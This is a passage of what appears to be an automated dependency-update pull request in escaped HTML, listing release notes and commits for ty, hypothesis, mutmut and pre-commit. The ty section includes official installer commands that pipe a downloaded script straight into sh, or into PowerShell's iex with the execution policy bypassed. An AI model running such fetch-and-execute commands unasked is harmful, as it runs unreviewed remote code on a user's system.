fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid treating \u003ccode\u003esys.implementation.version\u003c/code\u003e like \u003ccode\u003esys.version_info\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix anchor point for override diagnostics (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25621\"\u003e#25621\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCompact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReuse expression cache for TypedDict union inference (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25643\"\u003e#25643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore type checking\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEnable narrowing for unions of TypedDict (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25188\"\u003e#25188\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lerebear\"\u003e\u003ccode\u003e@​lerebear\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pierrem964\"\u003e\u003ccode\u003e@​pierrem964\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/charliermarsh\"\u003e\u003ccode\u003e@​charliermarsh\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Hugo-Polloli\"\u003e\u003ccode\u003e@​Hugo-Polloli\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eInstall ty 0.0.44\u003c/h2\u003e\n\u003ch3\u003eInstall prebuilt binaries via shell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003ecurl --proto '=https' --tlsv1.2 -LsSf https://releases.astral.sh/github/ty/releases/download/0.0.44/ty-installer.sh | sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eInstall prebuilt binaries via powershell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003epowershell -ExecutionPolicy Bypass -c \u0026quot;irm https://releases.astral.sh/github/ty/releases/download/0.0.44/ty-installer.ps1 | iex\u0026quot;\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch2\u003eDownload ty 0.0.44\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ty/blob/main/CHANGELOG.md\"\u003ety's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.44\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid treating \u003ccode\u003esys.implementation.version\u003c/code\u003e like \u003ccode\u003esys.version_info\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix anchor point for override diagnostics (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25621\"\u003e#25621\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCompact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReuse expression cache for TypedDict union inference (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25643\"\u003e#25643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore type checking\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEnable narrowing for unions of TypedDict (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25188\"\u003e#25188\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lerebear\"\u003e\u003ccode\u003e@​lerebear\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pierrem964\"\u003e\u003ccode\u003e@​pierrem964\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/charliermarsh\"\u003e\u003ccode\u003e@​charliermarsh\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Hugo-Polloli\"\u003e\u003ccode\u003e@​Hugo-Polloli\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.43\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't inject \u003ccode\u003eUnknown\u003c/code\u003e from non-callable elements of intersection call (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25538\"\u003e#25538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't needlessly disambiguate the same type alias (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25563\"\u003e#25563\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix variance inference for nested type aliases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25567\"\u003e#25567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eIgnore rejected member annotations for synthesized bindings (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25427\"\u003e#25427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNormalize dynamic class literals in cycle recovery (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25558\"\u003e#25558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRegister file roots for first-party search paths (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25522\"\u003e#25522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat union-bound typevars like unions for \u003ccode\u003epossibly-missing-attribute\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25561\"\u003e#25561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress importable completions that are already in scope (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25479\"\u003e#25479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/f5523e256eb275c9b473f174aedc383e7b050c34\"\u003e\u003ccode\u003ef5523e2\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.44 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3667\"\u003e#3667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/29ce3146faa2d42867dadd7ecbda84759b8183be\"\u003e\u003ccode\u003e29ce314\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.43 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3648\"\u003e#3648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/794322d34624abc56301bd85ac354b94ca54fbb2\"\u003e\u003ccode\u003e794322d\u003c/code\u003e\u003c/a\u003e Update docker/build-push-action action to v7.2.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3629\"\u003e#3629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/ce89685310383494c7dfec92bd2fc2dd2a46d074\"\u003e\u003ccode\u003ece89685\u003c/code\u003e\u003c/a\u003e Update prek dependencies (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3628\"\u003e#3628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/792fb71ca172f8d67fcfdb5fdd452a049724c8fd\"\u003e\u003ccode\u003e792fb71\u003c/code\u003e\u003c/a\u003e Update docker/login-action action to v4.2.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3630\"\u003e#3630\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/5c377476823a4b77a903fb5340d77b51d68db389\"\u003e\u003ccode\u003e5c37747\u003c/code\u003e\u003c/a\u003e Update docker/metadata-action action to v6.1.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3631\"\u003e#3631\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/5a3e1695ce1e2205070afc18d9a7449e0ed045d0\"\u003e\u003ccode\u003e5a3e169\u003c/code\u003e\u003c/a\u003e Update docker/setup-buildx-action action to v4.1.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3632\"\u003e#3632\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/c2500cc57e4aea85ae8e3287351538ad60a9ee00\"\u003e\u003ccode\u003ec2500cc\u003c/code\u003e\u003c/a\u003e Release: Force usage of PyPI as the index (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3616\"\u003e#3616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/7f8cb6457e8d77178ae9204f9b81a516f44444ed\"\u003e\u003ccode\u003e7f8cb64\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.42 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/41bb0d24412ad97c214bd0019e602c463ae3feba\"\u003e\u003ccode\u003e41bb0d2\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.41 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3601\"\u003e#3601\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ty/compare/0.0.31...0.0.44\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `hypothesis` from 6.152.1 to 6.155.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/HypothesisWorks/hypothesis/releases\"\u003ehypothesis's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.9\u003c/h2\u003e\n\u003cp\u003eThis release substantially improves our internal distribution for\ngenerating integers. This release has the most visible effect on\n\u0026quot;integers()\u0026quot;, but may incidentally improve other strategies which draw\nintegers internally.\u003c/p\u003e\n\u003cp\u003eOur integers distribution had two problems. First, it had jagged\ndiscontinuities at certain values where we switched sampling\napproaches. Second, it used a different distribution for bounded and\nunbounded ranges, which resulted in \u0026quot;st.integers()\u0026quot; and\n\u0026quot;st.integers(-2\u003cstrong\u003e64, 2\u003c/strong\u003e64)\u0026quot; producing very different distributions\ndespite being semantically similar.\u003c/p\u003e\n\u003cp\u003eWe now use a smooth distribution for both \u0026quot;st.integers()\u0026quot; and\n\u0026quot;st.integers(a, b)\u0026quot;, which fixes both of these issues. This should\nsubstantially improve our testing power in certain cases.\u003c/p\u003e\n\u003cp\u003eThe only way this release should be user-visible is that it finds more\nbugs! If this release is user-visible in other ways - for example,\nbecause it is slower, or produces a worse distribution in some cases -\nplease open an issue.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-9\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.8\u003c/h2\u003e\n\u003cp\u003eThis release drops support for end-of-life Django 4.2.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-8\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.7\u003c/h2\u003e\n\u003cp\u003eThis patch improves our type hints for \u0026quot;.filter()\u0026quot; to work with\n\u0026quot;typing.TypeGuard\u0026quot;. For example:\u003c/p\u003e\n\u003cp\u003efrom typing import TypeGuard\u003c/p\u003e\n\u003cp\u003efrom hypothesis import strategies as st\u003c/p\u003e\n\u003cp\u003edef is_str(x: object) -\u0026gt; TypeGuard[str]:\nreturn isinstance(x, str)\u003c/p\u003e\n\u003cp\u003es = st.from_type(object).filter(is_str)\u003c/p\u003e\n\u003ch1\u003epreviously: SearchStrategy[object]\u003c/h1\u003e\n\u003ch1\u003enow: SearchStrategy[str]\u003c/h1\u003e\n\u003cp\u003ereveal_type(s)\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-7\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.6\u003c/h2\u003e\n\u003cp\u003eThis patch adds a shrinking pass that tries natural text\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/fcc26c4c67eb9aaf4f153417f373f4c349128b54\"\u003e\u003ccode\u003efcc26c4\u003c/code\u003e\u003c/a\u003e Bump hypothesis version to 6.155.2 and update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/13cdd0b401f23468171e8d424da391892d5e5b26\"\u003e\u003ccode\u003e13cdd0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/HypothesisWorks/hypothesis/issues/4760\"\u003e#4760\u003c/a\u003e from Zac-HD/datetime-symbolic-4759\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/e48846d29ac846ca054697f4a2463f9550847e26\"\u003e\u003ccode\u003ee48846d\u003c/code\u003e\u003c/a\u003e format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/b4152eaeae285ef4e24f0ebdc72b1e9ce817f769\"\u003e\u003ccode\u003eb4152ea\u003c/code\u003e\u003c/a\u003e rewrite comments and improve test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/6b18db3fd215d15484f072b31bddafcef1a0b162\"\u003e\u003ccode\u003e6b18db3\u003c/code\u003e\u003c/a\u003e fixed flake\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/eb7d53abdc3a0c06efe919b4c75f6e4dc766d3f2\"\u003e\u003ccode\u003eeb7d53a\u003c/code\u003e\u003c/a\u003e Update pinned dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/1bbeb59dce2f9cfe5a4bde03bac16e8f09ae6da9\"\u003e\u003ccode\u003e1bbeb59\u003c/code\u003e\u003c/a\u003e Fix update_pyodide_versions for relocated xbuildenv metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/552a461a915fe2deb610db19766c9d120272d492\"\u003e\u003ccode\u003e552a461\u003c/code\u003e\u003c/a\u003e Make date/time drawing symbolic-execution friendly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/2c6dfdb16694041a49110590ef598b0324ff89f8\"\u003e\u003ccode\u003e2c6dfdb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/HypothesisWorks/hypothesis/issues/4758\"\u003e#4758\u003c/a\u003e from bsluther/docs-fix-assume-condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/1416fe1a5d906a5dffa176bddee8899da9e4b129\"\u003e\u003ccode\u003e1416fe1\u003c/code\u003e\u003c/a\u003e Fix assume condition in \u003ccode\u003eadapting-strategies.rst\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/HypothesisWorks/hypothesis/compare/hypothesis-python-6.152.1...v6.155.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `beautifulsoup4` from 4.14.3 to 4.15.0\n\nUpdates `mutmut` from 3.5.0 to 3.6.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/boxed/mutmut/blob/main/HISTORY.rst\"\u003emutmut's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.6.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Add `# pragma: no mutate block` and `# pragma: no mutate start/end` comments\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003edo_not_mutate_patterns\u003c/code\u003e to disable mutations with a regex\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003eonly_mutate\u003c/code\u003e config to select which files get mutated\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAlso mutate methods decorated with (only) \u003ccode\u003e@staticmethod\u003c/code\u003e or \u003ccode\u003e@classmethod\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003euse_setproctitle\u003c/code\u003e option to disable process renaming (automatically disabled on MacOS)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd (unstable) \u003ccode\u003etimeout_multiplier\u003c/code\u003e and \u003ccode\u003etimeout_constant\u003c/code\u003e options\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRename \u003ccode\u003epaths_to_mutate\u003c/code\u003e to \u003ccode\u003esource_paths\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003etests_dir\u003c/code\u003e in favor of \u003ccode\u003epytest_add_cli_args_test_selection\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eChange \u003ccode\u003emax_stack_depth\u003c/code\u003e to only consider functions inside \u003ccode\u003esource_paths\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisable mutation of enums and \u003ccode\u003e@staticmethod\u003c/code\u003e/\u003ccode\u003e@classmethod\u003c/code\u003e methods when \u003ccode\u003etype_check_command\u003c/code\u003e is set, as these mutations break type checking\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation for enum class methods\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutate_only_covered_lines when project uses custom coverage.py config\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix execution when running mutmut via \u003ccode\u003epython -m mutmut run\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation of \u003ccode\u003eclass _SomePrivateClass\u003c/code\u003e class methods\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation of default args\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003emutmut browse\u003c/code\u003e crash when no file is selected yet\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix timeout checker looking up the wrong mutant's expected test time, which could cause mutants to hang\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCompare stats paths after resolving symlinks\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWarn when mutmut cannot match mutants with the collected stats\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/boxed/mutmut/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pre-commit` from 4.5.1 to 4.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/releases\"\u003epre-commit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epre-commit v4.6.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier usage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/blob/main/CHANGELOG.md\"\u003epre-commit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.6.0 - 2026-04-21\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier\nusage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f35134b05028ec938ac605ae500fdf95462655d3\"\u003e\u003ccode\u003ef35134b\u003c/code\u003e\u003c/a\u003e v4.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2a51ffcb81f6c8ed2e6467913c3343a8800f3ab9\"\u003e\u003ccode\u003e2a51ffc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e from pre-commit/hook-impl-optional-hook-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/d7dee322abfc765b042f2e3b872aab3c3a867610\"\u003e\u003ccode\u003ed7dee32\u003c/code\u003e\u003c/a\u003e make --hook-dir optional for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/965aeb1c680e8b526342153547f0ec014484c63d\"\u003e\u003ccode\u003e965aeb1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e from pre-commit/hook-impl-required\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2eacc064aa9b5bb33d3a0d84a234b475e34f3096\"\u003e\u003ccode\u003e2eacc06\u003c/code\u003e\u003c/a\u003e --hook-type is required for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f5678bf4ac35cffc0ff7174ad85f7fdc2a5c977e\"\u003e\u003ccode\u003ef5678bf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca 